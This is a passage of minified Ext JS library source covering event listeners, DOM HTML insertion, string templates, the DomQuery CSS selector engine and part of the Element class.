var k = this, l = k.events;
if (k.listeners) {
k.on(k.listeners);
delete k.listeners
}
k.events = l || {}
};
h.Observable.prototype = {filterOptRe:/^(?:scope|delay|buffer|single)$/, fireEvent:function () {
var k = Array.prototype.slice.call(arguments, 0), m = k[0].toLowerCase(), n = this, l = g, p = n.events[m], s, o, r;
if (n.eventsSuspended === g) {
if (o = n.eventQueue) {
o.push(k)
}
} else {
if (typeof p == "object") {
if (p.bubble) {
if (p.fire.apply(p, k.slice(1)) === i) {
return i
}
r = n.getBubbleTarget && n.getBubbleTarget();
if (r && r.enableBubble) {
s = r.events[m];
if (!s || typeof s != "object" || !s.bubble) {
r.enableBubble(m)
}
return r.fireEvent.apply(r, k)
}
} else {
k.shift();
l = p.fire.apply(p, k)
}
}
}
return l
}, addListener:function (k, m, l, r) {
var n = this, q, s, p;
if (typeof k == "object") {
r = k;
for (q in r) {
s = r[q];
if (!n.filterOptRe.test(q)) {
n.addListener(q, s.fn || s, s.scope || r.scope, s.fn ? s : r)
}
}
} else {
k = k.toLowerCase();
p = n.events[k] || g;
if (typeof p == "boolean") {
n.events[k] = p = new h.Event(n, k)
}
p.addListener(m, l, typeof r == "object" ? r : {})
}
}, removeListener:function (k, m, l) {
var n = this.events[k.toLowerCase()];
if (typeof n == "object") {
n.removeListener(m, l)
}
}, purgeListeners:function () {
var m = this.events, k, l;
for (l in m) {
k = m[l];
if (typeof k == "object") {
k.clearListeners()
}
}
}, addEvents:function (n) {
var m = this;
m.events = m.events || {};
if (typeof n == "string") {
var k = arguments, l = k.length;
while (l--) {
m.events[k[l]] = m.events[k[l]] || g
}
} else {
Ext.applyIf(m.events, n)
}
}, hasListener:function (k) {
var l = this.events[k.toLowerCase()];
return typeof l == "object" && l.listeners.length > 0
}, suspendEvents:function (k) {
this.eventsSuspended = g;
if (k && !this.eventQueue) {
this.eventQueue = []
}
}, resumeEvents:function () {
var k = this, l = k.eventQueue || [];
k.eventsSuspended = i;
delete k.eventQueue;
j(l, function (m) {
k.fireEvent.apply(k, m)
})
}};
var d = h.Observable.prototype;
d.on = d.addListener;
d.un = d.removeListener;
h.Observable.releaseCapture = function (k) {
k.fireEvent = d.fireEvent
};
function e(l, m, k) {
return function () {
if (m.target == arguments[0]) {
l.apply(k, Array.prototype.slice.call(arguments, 0))
}
}
}
function b(n, p, k, m) {
k.task = new h.DelayedTask();
return function () {
k.task.delay(p.buffer, n, m, Array.prototype.slice.call(arguments, 0))
}
}
function c(m, n, l, k) {
return function () {
n.removeListener(l, k);
return m.apply(k, arguments)
}
}
function a(n, p, k, m) {
return function () {
var l = new h.DelayedTask(), o = Array.prototype.slice.call(arguments, 0);
if (!k.tasks) {
k.tasks = []
}
k.tasks.push(l);
l.delay(p.delay || 10, function () {
k.tasks.remove(l);
n.apply(m, o)
}, m)
}
}
h.Event = function (l, k) {
this.name = k;
this.obj = l;
this.listeners = []
};
h.Event.prototype = {addListener:function (o, n, m) {
var p = this, k;
n = n || p.obj;
if (!p.isListening(o, n)) {
k = p.createListener(o, n, m);
if (p.firing) {
p.listeners = p.listeners.slice(0)
}
p.listeners.push(k)
}
}, createListener:function (p, n, q) {
q = q || {};
n = n || this.obj;
var k = {fn:p, scope:n, options:q}, m = p;
if (q.target) {
m = e(m, q, n)
}
if (q.delay) {
m = a(m, q, k, n)
}
if (q.single) {
m = c(m, this, p, n)
}
if (q.buffer) {
m = b(m, q, k, n)
}
k.fireFn = m;
return k
}, findListener:function (o, n) {
var p = this.listeners, m = p.length, k;
n = n || this.obj;
while (m--) {
k = p[m];
if (k) {
if (k.fn == o && k.scope == n) {
return m
}
}
}
return -1
}, isListening:function (l, k) {
return this.findListener(l, k) != -1
}, removeListener:function (r, q) {
var p, m, n, s = this, o = i;
if ((p = s.findListener(r, q)) != -1) {
if (s.firing) {
s.listeners = s.listeners.slice(0)
}
m = s.listeners[p];
if (m.task) {
m.task.cancel();
delete m.task
}
n = m.tasks && m.tasks.length;
if (n) {
while (n--) {
m.tasks[n].cancel()
}
delete m.tasks
}
s.listeners.splice(p, 1);
o = g
}
return o
}, clearListeners:function () {
var n = this, k = n.listeners, m = k.length;
while (m--) {
n.removeListener(k[m].fn, k[m].scope)
}
}, fire:function () {
var q = this, p = q.listeners, k = p.length, o = 0, m;
if (k > 0) {
q.firing = g;
var n = Array.prototype.slice.call(arguments, 0);
for (; o < k; o++) {
m = p[o];
if (m && m.fireFn.apply(m.scope || q.obj || window, n) === i) {
return(q.firing = i)
}
}
}
q.firing = i;
return g
}}
})();
Ext.DomHelper = function () {
var x = null, k = /^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i, m = /^table|tbody|tr|td$/i, d = /tag|children|cn|html$/i, t = /td|tr|tbody/i, o = /([a-z0-9-]+)\s*:\s*([^;\s]+(?:\s*[^;\s]+)*);?/gi, v = /end/i, r, n = "afterbegin", p = "afterend", c = "beforebegin", q = "beforeend", a = "<table>", i = "</table>", b = a + "<tbody>", j = "</tbody>" + i, l = b + "<tr>", w = "</tr>" + j;
function h(B, D, C, E, A, y) {
var z = r.insertHtml(E, Ext.getDom(B), u(D));
return C ? Ext.get(z, true) : z
}
function u(D) {
var z = "", y, C, B, E;
if (typeof D == "string") {
z = D
} else {
if (Ext.isArray(D)) {
for (var A = 0; A < D.length; A++) {
if (D[A]) {
z += u(D[A])
}
}
} else {
z += "<" + (D.tag = D.tag || "div");
for (y in D) {
C = D[y];
if (!d.test(y)) {
if (typeof C == "object") {
z += " " + y + '="';
for (B in C) {
z += B + ":" + C[B] + ";"
}
z += '"'
} else {
z += " " + ({cls:"class", htmlFor:"for"}[y] || y) + '="' + C + '"'
}
}
}
if (k.test(D.tag)) {
z += "/>"
} else {
z += ">";
if ((E = D.children || D.cn)) {
z += u(E)
} else {
if (D.html) {
z += D.html
}
}
z += "</" + D.tag + ">"
}
}
}
return z
}
function g(F, C, B, D) {
x.innerHTML = [C, B, D].join("");
var y = -1, A = x, z;
while (++y < F) {
A = A.firstChild
}
if (z = A.nextSibling) {
var E = document.createDocumentFragment();
while (A) {
z = A.nextSibling;
E.appendChild(A);
A = z
}
A = E
}
return A
}
function e(y, z, B, A) {
var C, D;
x = x || document.createElement("div");
if (y == "td" && (z == n || z == q) || !t.test(y) && (z == c || z == p)) {
return
}
D = z == c ? B : z == p ? B.nextSibling : z == n ? B.firstChild : null;
if (z == c || z == p) {
B = B.parentNode
}
if (y == "td" || (y == "tr" && (z == q || z == n))) {
C = g(4, l, A, w)
} else {
if ((y == "tbody" && (z == q || z == n)) || (y == "tr" && (z == c || z == p))) {
C = g(3, b, A, j)
} else {
C = g(2, a, A, i)
}
}
B.insertBefore(C, D);
return C
}
function s(A) {
var D = document.createElement("div"), y = document.createDocumentFragment(), z = 0, B, C;
D.innerHTML = A;
C = D.childNodes;
B = C.length;
for (; z < B; z++) {
y.appendChild(C[z].cloneNode(true))
}
return y
}
r = {markup:function (y) {
return u(y)
}, applyStyles:function (y, z) {
if (z) {
var A;
y = Ext.fly(y);
if (typeof z == "function") {
z = z.call()
}
if (typeof z == "string") {
o.lastIndex = 0;
while ((A = o.exec(z))) {
y.setStyle(A[1], A[2])
}
} else {
if (typeof z == "object") {
y.setStyle(z)
}
}
}
}, insertHtml:function (D, y, E) {
var B = {}, A, F, C, G, H, z;
D = D.toLowerCase();
B[c] = ["BeforeBegin", "previousSibling"];
B[p] = ["AfterEnd", "nextSibling"];
if (y.insertAdjacentHTML) {
if (m.test(y.tagName) && (z = e(y.tagName.toLowerCase(), D, y, E))) {
return z
}
B[n] = ["AfterBegin", "firstChild"];
B[q] = ["BeforeEnd", "lastChild"];
if ((A = B[D])) {
y.insertAdjacentHTML(A[0], E);
return y[A[1]]
}
} else {
F = y.ownerDocument.createRange();
G = "setStart" + (v.test(D) ? "After" : "Before");
if (B[D]) {
F[G](y);
if (!F.createContextualFragment) {
H = s(E)
} else {
H = F.createContextualFragment(E)
}
y.parentNode.insertBefore(H, D == c ? y : y.nextSibling);
return y[(D == c ? "previous" : "next") + "Sibling"]
} else {
C = (D == n ? "first" : "last") + "Child";
if (y.firstChild) {
F[G](y[C]);
if (!F.createContextualFragment) {
H = s(E)
} else {
H = F.createContextualFragment(E)
}
if (D == n) {
y.insertBefore(H, y.firstChild)
} else {
y.appendChild(H)
}
} else {
y.innerHTML = E
}
return y[C]
}
}
throw'Illegal insertion point -> "' + D + '"'
}, insertBefore:function (y, A, z) {
return h(y, A, z, c)
}, insertAfter:function (y, A, z) {
return h(y, A, z, p, "nextSibling")
}, insertFirst:function (y, A, z) {
return h(y, A, z, n, "firstChild")
}, append:function (y, A, z) {
return h(y, A, z, q, "", true)
}, overwrite:function (y, A, z) {
y = Ext.getDom(y);
y.innerHTML = u(A);
return z ? Ext.get(y.firstChild) : y.firstChild
}, createHtml:u};
return r
}();
Ext.Template = function (h) {
var j = this, c = arguments, e = [], d;
if (Ext.isArray(h)) {
h = h.join("")
} else {
if (c.length > 1) {
for (var g = 0, b = c.length; g < b; g++) {
d = c[g];
if (typeof d == "object") {
Ext.apply(j, d)
} else {
e.push(d)
}
}
h = e.join("")
}
}
j.html = h;
if (j.compiled) {
j.compile()
}
};
Ext.Template.prototype = {re:/\{([\w\-]+)\}/g, applyTemplate:function (a) {
var b = this;
return b.compiled ? b.compiled(a) : b.html.replace(b.re, function (c, d) {
return a[d] !== undefined ? a[d] : ""
})
}, set:function (a, c) {
var b = this;
b.html = a;
b.compiled = null;
return c ? b.compile() : b
}, compile:function () {
var me = this, sep = Ext.isGecko ? "+" : ",";
function fn(m, name) {
name = "values['" + name + "']";
return"'" + sep + "(" + name + " == undefined ? '' : " + name + ")" + sep + "'"
}
eval("this.compiled = function(values){ return " + (Ext.isGecko ? "'" : "['") + me.html.replace(/\\/g, "\\\\").replace(/(\r\n|\n)/g, "\\n").replace(/'/g, "\\'").replace(this.re, fn) + (Ext.isGecko ? "';};" : "'].join('');};"));
return me
}, insertFirst:function (b, a, c) {
return this.doInsert("afterBegin", b, a, c)
}, insertBefore:function (b, a, c) {
return this.doInsert("beforeBegin", b, a, c)
}, insertAfter:function (b, a, c) {
return this.doInsert("afterEnd", b, a, c)
}, append:function (b, a, c) {
return this.doInsert("beforeEnd", b, a, c)
}, doInsert:function (c, e, b, a) {
e = Ext.getDom(e);
var d = Ext.DomHelper.insertHtml(c, e, this.applyTemplate(b));
return a ? Ext.get(d, true) : d
}, overwrite:function (b, a, c) {
b = Ext.getDom(b);
b.innerHTML = this.applyTemplate(a);
return c ? Ext.get(b.firstChild, true) : b.firstChild
}};
Ext.Template.prototype.apply = Ext.Template.prototype.applyTemplate;
Ext.Template.from = function (b, a) {
b = Ext.getDom(b);
return new Ext.Template(b.value || b.innerHTML, a || "")
};
Ext.DomQuery = function () {
var cache = {}, simpleCache = {}, valueCache = {}, nonSpace = /\S/, trimRe = /^\s+|\s+$/g, tplRe = /\{(\d+)\}/g, modeRe = /^(\s?[\/>+~]\s?|\s|$)/, tagTokenRe = /^(#)?([\w\-\*]+)/, nthRe = /(\d*)n\+?(\d*)/, nthRe2 = /\D/, isIE = window.ActiveXObject ? true : false, key = 30803;
eval("var batch = 30803;");
function child(parent, index) {
var i = 0, n = parent.firstChild;
while (n) {
if (n.nodeType == 1) {
if (++i == index) {
return n
}
}
n = n.nextSibling
}
return null
}
function next(n) {
while ((n = n.nextSibling) && n.nodeType != 1) {
}
return n
}
function prev(n) {
while ((n = n.previousSibling) && n.nodeType != 1) {
}
return n
}
function children(parent) {
var n = parent.firstChild, nodeIndex = -1, nextNode;
while (n) {
nextNode = n.nextSibling;
if (n.nodeType == 3 && !nonSpace.test(n.nodeValue)) {
parent.removeChild(n)
} else {
n.nodeIndex = ++nodeIndex
}
n = nextNode
}
return this
}
function byClassName(nodeSet, cls) {
if (!cls) {
return nodeSet
}
var result = [], ri = -1;
for (var i = 0, ci; ci = nodeSet[i]; i++) {
if ((" " + ci.className + " ").indexOf(cls) != -1) {
result[++ri] = ci
}
}
return result
}
function attrValue(n, attr) {
if (!n.tagName && typeof n.length != "undefined") {
n = n[0]
}
if (!n) {
return null
}
if (attr == "for") {
return n.htmlFor
}
if (attr == "class" || attr == "className") {
return n.className
}
return n.getAttribute(attr) || n[attr]
}
function getNodes(ns, mode, tagName) {
var result = [], ri = -1, cs;
if (!ns) {
return result
}
tagName = tagName || "*";
if (typeof ns.getElementsByTagName != "undefined") {
ns = [ns]
}
if (!mode) {
for (var i = 0, ni; ni = ns[i]; i++) {
cs = ni.getElementsByTagName(tagName);
for (var j = 0, ci; ci = cs[j]; j++) {
result[++ri] = ci
}
}
} else {
if (mode == "/" || mode == ">") {
var utag = tagName.toUpperCase();
for (var i = 0, ni, cn; ni = ns[i]; i++) {
cn = ni.childNodes;
for (var j = 0, cj; cj = cn[j]; j++) {
if (cj.nodeName == utag || cj.nodeName == tagName || tagName == "*") {
result[++ri] = cj
}
}
}
} else {
if (mode == "+") {
var utag = tagName.toUpperCase();
for (var i = 0, n; n = ns[i]; i++) {
while ((n = n.nextSibling) && n.nodeType != 1) {
}
if (n && (n.nodeName == utag || n.nodeName == tagName || tagName == "*")) {
result[++ri] = n
}
}
} else {
if (mode == "~") {
var utag = tagName.toUpperCase();
for (var i = 0, n; n = ns[i]; i++) {
while ((n = n.nextSibling)) {
if (n.nodeName == utag || n.nodeName == tagName || tagName == "*") {
result[++ri] = n
}
}
}
}
}
}
}
return result
}
function concat(a, b) {
if (b.slice) {
return a.concat(b)
}
for (var i = 0, l = b.length; i < l; i++) {
a[a.length] = b[i]
}
return a
}
function byTag(cs, tagName) {
if (cs.tagName || cs == document) {
cs = [cs]
}
if (!tagName) {
return cs
}
var result = [], ri = -1;
tagName = tagName.toLowerCase();
for (var i = 0, ci; ci = cs[i]; i++) {
if (ci.nodeType == 1 && ci.tagName.toLowerCase() == tagName) {
result[++ri] = ci
}
}
return result
}
function byId(cs, id) {
if (cs.tagName || cs == document) {
cs = [cs]
}
if (!id) {
return cs
}
var result = [], ri = -1;
for (var i = 0, ci; ci = cs[i]; i++) {
if (ci && ci.id == id) {
result[++ri] = ci;
return result
}
}
return result
}
function byAttribute(cs, attr, value, op, custom) {
var result = [], ri = -1, useGetStyle = custom == "{", fn = Ext.DomQuery.operators[op], a, xml, hasXml;
for (var i = 0, ci; ci = cs[i]; i++) {
if (ci.nodeType != 1) {
continue
}
if (!hasXml) {
xml = Ext.DomQuery.isXml(ci);
hasXml = true
}
if (!xml) {
if (useGetStyle) {
a = Ext.DomQuery.getStyle(ci, attr)
} else {
if (attr == "class" || attr == "className") {
a = ci.className
} else {
if (attr == "for") {
a = ci.htmlFor
} else {
if (attr == "href") {
a = ci.getAttribute("href", 2)
} else {
a = ci.getAttribute(attr)
}
}
}
}
} else {
a = ci.getAttribute(attr)
}
if ((fn && fn(a, value)) || (!fn && a)) {
result[++ri] = ci
}
}
return result
}
function byPseudo(cs, name, value) {
return Ext.DomQuery.pseudos[name](cs, value)
}
function nodupIEXml(cs) {
var d = ++key, r;
cs[0].setAttribute("_nodup", d);
r = [cs[0]];
for (var i = 1, len = cs.length; i < len; i++) {
var c = cs[i];
if (!c.getAttribute("_nodup") != d) {
c.setAttribute("_nodup", d);
r[r.length] = c
}
}
for (var i = 0, len = cs.length; i < len; i++) {
cs[i].removeAttribute("_nodup")
}
return r
}
function nodup(cs) {
if (!cs) {
return[]
}
var len = cs.length, c, i, r = cs, cj, ri = -1;
if (!len || typeof cs.nodeType != "undefined" || len == 1) {
return cs
}
if (isIE && typeof cs[0].selectSingleNode != "undefined") {
return nodupIEXml(cs)
}
var d = ++key;
cs[0]._nodup = d;
for (i = 1; c = cs[i]; i++) {
if (c._nodup != d) {
c._nodup = d
} else {
r = [];
for (var j = 0; j < i; j++) {
r[++ri] = cs[j]
}
for (j = i + 1; cj = cs[j]; j++) {
if (cj._nodup != d) {
cj._nodup = d;
r[++ri] = cj
}
}
return r
}
}
return r
}
function quickDiffIEXml(c1, c2) {
var d = ++key, r = [];
for (var i = 0, len = c1.length; i < len; i++) {
c1[i].setAttribute("_qdiff", d)
}
for (var i = 0, len = c2.length; i < len; i++) {
if (c2[i].getAttribute("_qdiff") != d) {
r[r.length] = c2[i]
}
}
for (var i = 0, len = c1.length; i < len; i++) {
c1[i].removeAttribute("_qdiff")
}
return r
}
function quickDiff(c1, c2) {
var len1 = c1.length, d = ++key, r = [];
if (!len1) {
return c2
}
if (isIE && typeof c1[0].selectSingleNode != "undefined") {
return quickDiffIEXml(c1, c2)
}
for (var i = 0; i < len1; i++) {
c1[i]._qdiff = d
}
for (var i = 0, len = c2.length; i < len; i++) {
if (c2[i]._qdiff != d) {
r[r.length] = c2[i]
}
}
return r
}
function quickId(ns, mode, root, id) {
if (ns == root) {
var d = root.ownerDocument || root;
return d.getElementById(id)
}
ns = getNodes(ns, mode, "*");
return byId(ns, id)
}
return{getStyle:function (el, name) {
return Ext.fly(el).getStyle(name)
}, compile:function (path, type) {
type = type || "select";
var fn = ["var f = function(root){\n var mode; ++batch; var n = root || document;\n"], mode, lastPath, matchers = Ext.DomQuery.matchers, matchersLn = matchers.length, modeMatch, lmode = path.match(modeRe);
if (lmode && lmode[1]) {
fn[fn.length] = 'mode="' + lmode[1].replace(trimRe, "") + '";';
path = path.replace(lmode[1], "")
}
while (path.substr(0, 1) == "/") {
path = path.substr(1)
}
while (path && lastPath != path) {
lastPath = path;
var tokenMatch = path.match(tagTokenRe);
if (type == "select") {
if (tokenMatch) {
if (tokenMatch[1] == "#") {
fn[fn.length] = 'n = quickId(n, mode, root, "' + tokenMatch[2] + '");'
} else {
fn[fn.length] = 'n = getNodes(n, mode, "' + tokenMatch[2] + '");'
}
path = path.replace(tokenMatch[0], "")
} else {
if (path.substr(0, 1) != "@") {
fn[fn.length] = 'n = getNodes(n, mode, "*");'
}
}
} else {
if (tokenMatch) {
if (tokenMatch[1] == "#") {
fn[fn.length] = 'n = byId(n, "' + tokenMatch[2] + '");'
} else {
fn[fn.length] = 'n = byTag(n, "' + tokenMatch[2] + '");'
}
path = path.replace(tokenMatch[0], "")
}
}
while (!(modeMatch = path.match(modeRe))) {
var matched = false;
for (var j = 0; j < matchersLn; j++) {
var t = matchers[j];
var m = path.match(t.re);
if (m) {
fn[fn.length] = t.select.replace(tplRe, function (x, i) {
return m[i]
});
path = path.replace(m[0], "");
matched = true;
break
}
}
if (!matched) {
throw'Error parsing selector, parsing failed at "' + path + '"'
}
}
if (modeMatch[1]) {
fn[fn.length] = 'mode="' + modeMatch[1].replace(trimRe, "") + '";';
path = path.replace(modeMatch[1], "")
}
}
fn[fn.length] = "return nodup(n);\n}";
eval(fn.join(""));
return f
}, jsSelect:function (path, root, type) {
root = root || document;
if (typeof root == "string") {
root = document.getElementById(root)
}
var paths = path.split(","), results = [];
for (var i = 0, len = paths.length; i < len; i++) {
var subPath = paths[i].replace(trimRe, "");
if (!cache[subPath]) {
cache[subPath] = Ext.DomQuery.compile(subPath);
if (!cache[subPath]) {
throw subPath + " is not a valid selector"
}
}
var result = cache[subPath](root);
if (result && result != document) {
results = results.concat(result)
}
}
if (paths.length > 1) {
return nodup(results)
}
return results
}, isXml:function (el) {
var docEl = (el ? el.ownerDocument || el : 0).documentElement;
return docEl ? docEl.nodeName !== "HTML" : false
}, select:document.querySelectorAll ? function (path, root, type) {
root = root || document;
if (!Ext.DomQuery.isXml(root)) {
try {
var cs = root.querySelectorAll(path);
return Ext.toArray(cs)
} catch (ex) {
}
}
return Ext.DomQuery.jsSelect.call(this, path, root, type)
} : function (path, root, type) {
return Ext.DomQuery.jsSelect.call(this, path, root, type)
}, selectNode:function (path, root) {
return Ext.DomQuery.select(path, root)[0]
}, selectValue:function (path, root, defaultValue) {
path = path.replace(trimRe, "");
if (!valueCache[path]) {
valueCache[path] = Ext.DomQuery.compile(path, "select")
}
var n = valueCache[path](root), v;
n = n[0] ? n[0] : n;
if (typeof n.normalize == "function") {
n.normalize()
}
v = (n && n.firstChild ? n.firstChild.nodeValue : null);
return((v === null || v === undefined || v === "") ? defaultValue : v)
}, selectNumber:function (path, root, defaultValue) {
var v = Ext.DomQuery.selectValue(path, root, defaultValue || 0);
return parseFloat(v)
}, is:function (el, ss) {
if (typeof el == "string") {
el = document.getElementById(el)
}
var isArray = Ext.isArray(el), result = Ext.DomQuery.filter(isArray ? el : [el], ss);
return isArray ? (result.length == el.length) : (result.length > 0)
}, filter:function (els, ss, nonMatches) {
ss = ss.replace(trimRe, "");
if (!simpleCache[ss]) {
simpleCache[ss] = Ext.DomQuery.compile(ss, "simple")
}
var result = simpleCache[ss](els);
return nonMatches ? quickDiff(result, els) : result
}, matchers:[
{re:/^\.([\w\-]+)/, select:'n = byClassName(n, " {1} ");'},
{re:/^\:([\w\-]+)(?:\(((?:[^\s>\/]*|.*?))\))?/, select:'n = byPseudo(n, "{1}", "{2}");'},
{re:/^(?:([\[\{])(?:@)?([\w\-]+)\s?(?:(=|.=)\s?(["']?)(.*?)\4)?[\]\}])/, select:'n = byAttribute(n, "{2}", "{5}", "{3}", "{1}");'},
{re:/^#([\w\-]+)/, select:'n = byId(n, "{1}");'},
{re:/^@([\w\-]+)/, select:'return {firstChild:{nodeValue:attrValue(n, "{1}")}};'}
], operators:{"=":function (a, v) {
return a == v
}, "!=":function (a, v) {
return a != v
}, "^=":function (a, v) {
return a && a.substr(0, v.length) == v
}, "$=":function (a, v) {
return a && a.substr(a.length - v.length) == v
}, "*=":function (a, v) {
return a && a.indexOf(v) !== -1
}, "%=":function (a, v) {
return(a % v) == 0
}, "|=":function (a, v) {
return a && (a == v || a.substr(0, v.length + 1) == v + "-")
}, "~=":function (a, v) {
return a && (" " + a + " ").indexOf(" " + v + " ") != -1
}}, pseudos:{"first-child":function (c) {
var r = [], ri = -1, n;
for (var i = 0, ci; ci = n = c[i]; i++) {
while ((n = n.previousSibling) && n.nodeType != 1) {
}
if (!n) {
r[++ri] = ci
}
}
return r
}, "last-child":function (c) {
var r = [], ri = -1, n;
for (var i = 0, ci; ci = n = c[i]; i++) {
while ((n = n.nextSibling) && n.nodeType != 1) {
}
if (!n) {
r[++ri] = ci
}
}
return r
}, "nth-child":function (c, a) {
var r = [], ri = -1, m = nthRe.exec(a == "even" && "2n" || a == "odd" && "2n+1" || !nthRe2.test(a) && "n+" + a || a), f = (m[1] || 1) - 0, l = m[2] - 0;
for (var i = 0, n; n = c[i]; i++) {
var pn = n.parentNode;
if (batch != pn._batch) {
var j = 0;
for (var cn = pn.firstChild; cn; cn = cn.nextSibling) {
if (cn.nodeType == 1) {
cn.nodeIndex = ++j
}
}
pn._batch = batch
}
if (f == 1) {
if (l == 0 || n.nodeIndex == l) {
r[++ri] = n
}
} else {
if ((n.nodeIndex + l) % f == 0) {
r[++ri] = n
}
}
}
return r
}, "only-child":function (c) {
var r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
if (!prev(ci) && !next(ci)) {
r[++ri] = ci
}
}
return r
}, empty:function (c) {
var r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
var cns = ci.childNodes, j = 0, cn, empty = true;
while (cn = cns[j]) {
++j;
if (cn.nodeType == 1 || cn.nodeType == 3) {
empty = false;
break
}
}
if (empty) {
r[++ri] = ci
}
}
return r
}, contains:function (c, v) {
var r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
if ((ci.textContent || ci.innerText || "").indexOf(v) != -1) {
r[++ri] = ci
}
}
return r
}, nodeValue:function (c, v) {
var r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
if (ci.firstChild && ci.firstChild.nodeValue == v) {
r[++ri] = ci
}
}
return r
}, checked:function (c) {
var r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
if (ci.checked == true) {
r[++ri] = ci
}
}
return r
}, not:function (c, ss) {
return Ext.DomQuery.filter(c, ss, true)
}, any:function (c, selectors) {
var ss = selectors.split("|"), r = [], ri = -1, s;
for (var i = 0, ci; ci = c[i]; i++) {
for (var j = 0; s = ss[j]; j++) {
if (Ext.DomQuery.is(ci, s)) {
r[++ri] = ci;
break
}
}
}
return r
}, odd:function (c) {
return this["nth-child"](c, "odd")
}, even:function (c) {
return this["nth-child"](c, "even")
}, nth:function (c, a) {
return c[a - 1] || []
}, first:function (c) {
return c[0] || []
}, last:function (c) {
return c[c.length - 1] || []
}, has:function (c, ss) {
var s = Ext.DomQuery.select, r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
if (s(ss, ci).length > 0) {
r[++ri] = ci
}
}
return r
}, next:function (c, ss) {
var is = Ext.DomQuery.is, r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
var n = next(ci);
if (n && is(n, ss)) {
r[++ri] = ci
}
}
return r
}, prev:function (c, ss) {
var is = Ext.DomQuery.is, r = [], ri = -1;
for (var i = 0, ci; ci = c[i]; i++) {
var n = prev(ci);
if (n && is(n, ss)) {
r[++ri] = ci
}
}
return r
}}}
}();
Ext.query = Ext.DomQuery.select;
Ext.util.DelayedTask = function (d, c, a) {
var e = this, g, b = function () {
clearInterval(g);
g = null;
d.apply(c, a || [])
};
e.delay = function (i, k, j, h) {
e.cancel();
d = k || d;
c = j || c;
a = h || a;
g = setInterval(b, i)
};
e.cancel = function () {
if (g) {
clearInterval(g);
g = null
}
}
};
(function () {
var h = document;
Ext.Element = function (l, m) {
var n = typeof l == "string" ? h.getElementById(l) : l, o;
if (!n) {
return null
}
o = n.id;
if (!m && o && Ext.elCache[o]) {
return Ext.elCache[o].el
}
this.dom = n;
this.id = o || Ext.id(n)
};
var d = Ext.DomHelper, e = Ext.Element, a = Ext.elCache;
e.prototype = {set:function (q, m) {
var n = this.dom, l, p, m = (m !== false) && !!n.setAttribute;
for (l in q) {
if (q.hasOwnProperty(l)) {
p = q[l];
if (l == "style") {
d.applyStyles(n, p)
} else {
if (l == "cls") {
n.className = p
} else {
if (m) {
n.setAttribute(l, p)
} else {
n[l] = p
}
}
}
}
}
return this
}, defaultUnit:"px", is:function (l) {
return Ext.DomQuery.is(this.dom, l)
}, focus:function (o, n) {
var l = this, n = n || l.dom;
try {
if (Number(o)) {
l.focus.defer(o, null, [null, n])
} else {
n.focus()
}
} catch (m) {
}
return l
}, blur:function () {
try {
this.dom.blur()
} catch (l) {
}
return this
}, getValue:function (l) {
var m = this.dom.value;
return l ? parseInt(m, 10) : m
}, addListener:function (l, o, n, m) {
Ext.EventManager.on(this.dom, l, o, n || this, m);
return this
}, removeListener:function (l, n, m) {
Ext.EventManager.removeListener(this.dom, l, n, m || this);
return this
}, removeAllListeners:function () {
Ext.EventManager.removeAll(this.dom);
return this
}, purgeAllListeners:function () {
Ext.EventManager.purgeElement(this, true);
return this
}, addUnits:function (l) {
if (l === "" || l == "auto" || l === undefined) {
l = l || ""
} else {
if (!isNaN(l) || !i.test(l)) {
l = l + (this.defaultUnit || "px")
}
}
return l
}, load:function (m, n, l) {
Ext.Ajax.request(Ext.apply({params:n, url:m.url || m, callback:l, el:this.dom, indicatorText:m.indicatorText || ""}, Ext.isObject(m) ? m : {}));
return this
}, isBorderBox:function () {
return Ext.isBorderBox || Ext.isForcedBorderBox || g[(this.dom.tagName || "").toLowerCase()]
}, remove:function () {
var l = this, m = l.dom;
if (m) {
delete l.dom;
Ext.removeNode(m)
}
}, hover:function (m, l, o, n) {
var p = this;
p.on("mouseenter", m, o || p.dom, n);
p.on("mouseleave", l, o || p.dom, n);
return p
}, contains:function (l) {
return !l ? false : Ext.lib.Dom.isAncestor(this.dom, l.dom ? l.dom : l)
}, getAttributeNS:function (m, l) {
return this.getAttribute(l, m)
}, getAttribute:(function () {
var p = document.createElement("table"), o = false, m = "getAttribute" in p, l = /undefined|unknown/;
if (m) {
try {
p.getAttribute("ext:qtip")
} catch (n) {
o = true
}
return function (q, s) {
var r = this.dom, t;
if (r.getAttributeNS) {
t = r.getAttributeNS(s, q) || null
}
if (t == null) {
if (s) {
if (o && r.tagName.toUpperCase() == "TABLE") {
try {
t = r.getAttribute(s + ":" + q)
} catch (u) {
t = ""
}
} else {
t = r.getAttribute(s + ":" + q)
}
} else {
t = r.getAttribute(q) || r[q]
}
}
return t || ""
}
} else {
return function (q, s) {
var r = this.om, u, t;
if (s) {
t = r[s + ":" + q];
u = l.test(typeof t) ? undefined : t
} else {
u = r[q]
}
return u || ""
}
}
p = null
})(), update:function (l) {
if (this.dom) {
this.dom.innerHTML = l
}
return this
}};
var k = e.prototype;
e.addMethods = function (l) {
Ext.apply(k, l)
};
k.on = k.addListener;
k.un = k.removeListener;
k.autoBoxAdjust = true;
var i = /\d+(px|em|%|en|ex|pt|in|cm|mm|pc)$/i, c;
e.get = function (m) {
var l, p, o;
if (!m) {
return null
}
if (typeof m == "string") {
if (!(p = h.getElementById(m))) {
return null
}
if (a[m] && a[m].el) {
l = a[m].el;
l.dom = p
} else {
l = e.addToCache(new e(p))
}
return l
} else {
if (m.tagName) {
if (!(o = m.id)) {
o = Ext.id(m)
}
if (a[o] && a[o].el) {
l = a[o].el;
l.dom = m
} else {
l = e.addToCache(new e(m))
}
return l
} else {
if (m instanceof e) {
if (m != c) {
if (Ext.isIE && (m.id == undefined || m.id == "")) {
m.dom = m.dom
} else {
m.dom = h.getElementById(m.id) || m.dom
}
}
return m
} else {
if (m.isComposite) {
return m
} else {
if (Ext.isArray(m)) {
return e.select(m)
} else {
if (m == h) {
if (!c) {
var n = function () {
};
n.prototype = e.prototype;
c = new n();
c.dom = h
}
return c
}
}
}
}
}
}
return null
};
e.addToCache = function (l, m) {
m = m || l.id;
a[m] = {el:l, data:{}, events:{}};
return l
};
e.data = function (m, l, n) {
m = e.get(m);
if (!m) {
return null
}
